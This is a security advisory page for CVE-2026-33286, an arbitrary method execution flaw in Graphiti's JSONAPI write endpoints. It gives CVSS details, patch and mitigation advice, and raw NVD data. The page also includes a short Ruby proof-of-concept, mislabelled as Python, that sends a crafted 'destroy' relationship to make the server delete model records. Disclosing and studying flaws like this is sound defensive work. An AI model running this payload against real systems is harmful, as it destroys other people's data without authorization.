Security Vulnerability Report
中文
CVE-2026-33286 CVSS 9.1 CRITICAL

CVE-2026-33286

Published: 2026-03-24 00:16:31
Last Modified: 2026-03-25 17:18:24
Source: [email protected]

Description

Graphiti is a framework that sits on top of models and exposes them via a JSON:API-compliant interface. Versions prior to 1.10.2 have an arbitrary method execution vulnerability that affects Graphiti's JSONAPI write functionality. An attacker can craft a malicious JSONAPI payload with arbitrary relationship names to invoke any public method on the underlying model instance, class or its associations. Any application exposing Graphiti write endpoints (create/update/delete) to untrusted users is affected. The `Graphiti::Util::ValidationResponse#all_valid?` method recursively calls `model.send(name)` using relationship names taken directly from user-supplied JSONAPI payloads, without validating them against the resource's configured sideloads. This allows an attacker to potentially run any public method on a given model instance, on the instance class or associated instances or classes, including destructive operations. This is patched in Graphiti v1.10.2. Users should upgrade as soon as possible. Some workarounds are available. Ensure Graphiti write endpoints (create/update) are not accessible to untrusted users and/or apply strong authentication and authorization checks before any write operation is processed, for example use Rails strong parameters to ensure only valid parameters are processed.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:graphiti:graphiti:*:*:*:*:*:ruby:*:* - VULNERABLE
Graphiti < 1.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
require 'net/http' require 'json' # Target URL (Example) uri = URI('http://target-url.com/api/v1/posts') http = Net::HTTP.new(uri.host, uri.port) # Create a POST request req = Net::HTTP::Post.new(uri.path, {'Content-Type' => 'application/vnd.api+json'}) # Malicious JSONAPI payload # The key 'destroy' inside 'relationships' is treated as a method name # and passed to model.send('destroy') payload = { data: { type: 'posts', attributes: { title: 'Exploit' }, relationships: { # Arbitrary method name to invoke on the model 'destroy': { data: { type: 'comments', id: '1' } } } } } req.body = payload.to_json # Send request response = http.request(req) puts "Response Code: #{response.code}" puts "Response Body: #{response.body}"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33286", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:30.683", "lastModified": "2026-03-25T17:18:23.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Graphiti is a framework that sits on top of models and exposes them via a JSON:API-compliant interface. Versions prior to 1.10.2 have an arbitrary method execution vulnerability that affects Graphiti's JSONAPI write functionality. An attacker can craft a malicious JSONAPI payload with arbitrary relationship names to invoke any public method on the underlying model instance, class or its associations. Any application exposing Graphiti write endpoints (create/update/delete) to untrusted users is affected. The `Graphiti::Util::ValidationResponse#all_valid?` method recursively calls `model.send(name)` using relationship names taken directly from user-supplied JSONAPI payloads, without validating them against the resource's configured sideloads. This allows an attacker to potentially run any public method on a given model instance, on the instance class or associated instances or classes, including destructive operations. This is patched in Graphiti v1.10.2. Users should upgrade as soon as possible. Some workarounds are available. Ensure Graphiti write endpoints (create/update) are not accessible to untrusted users and/or apply strong authentication and authorization checks before any write operation is processed, for example use Rails strong parameters to ensure only valid parameters are processed."}, {"lang": "es", "value": "Graphiti es un framework que se asienta sobre modelos y los expone a través de una interfaz compatible con JSON:API. Las versiones anteriores a la 1.10.2 tienen una vulnerabilidad de ejecución arbitraria de métodos que afecta la funcionalidad de escritura JSONAPI de Graphiti. Un atacante puede crear una carga útil JSONAPI maliciosa con nombres de relación arbitrarios para invocar cualquier método público en la instancia del modelo subyacente, la clase o sus asociaciones. Cualquier aplicación que exponga puntos finales de escritura de Graphiti (crear/actualizar/eliminar) a usuarios no confiables se ve afectada. El método 'Graphiti::Util::ValidationResponse#all_valid?' llama recursivamente a 'model.send(name)' utilizando nombres de relación tomados directamente de las cargas útiles JSONAPI proporcionadas por el usuario, sin validarlos contra los sideloads configurados del recurso. Esto permite a un atacante ejecutar potencialmente cualquier método público en una instancia de modelo dada, en la clase de la instancia o en instancias o clases asociadas, incluyendo operaciones destructivas. Esto está parcheado en Graphiti v1.10.2. Los usuarios deben actualizar lo antes posible. Algunas soluciones alternativas están disponibles. Asegúrese de que los puntos finales de escritura de Graphiti (crear/actualizar) no sean accesibles para usuarios no confiables y/o aplique fuertes controles de autenticación y autorización antes de que se procese cualquier operación de escritura, por ejemplo, use los parámetros fuertes de Rails para asegurar que solo se procesen parámetros válidos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-913"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:graphiti:graphiti:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "1.10.2", "matchCriteriaId": "2C0B7C94-5FBF-428C-B558-7A56DA34C7D2"}]}]}], "references": [{"url": "https://github.com/graphiti-api/graphiti/commit/ddb5ad2b69330774bd1a47935ed89a9fe4396a54", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/graphiti-api/graphiti/releases/tag/v1.10.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.